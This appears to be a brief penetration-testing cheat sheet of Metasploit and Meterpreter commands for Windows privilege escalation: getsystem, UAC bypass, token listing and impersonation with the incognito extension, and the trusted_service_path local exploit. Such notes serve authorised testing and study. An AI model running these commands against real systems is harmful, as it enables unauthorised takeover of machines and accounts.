Table of Content

Windows

getsystem

run post/windows/gather/win_privs

bypassuac

Incognito is an extension built for lateral Windows privesc

use incognito

list_tokens -u

impersonate_token $USER

use exploit/windows/local/trusted_service_path

show options

run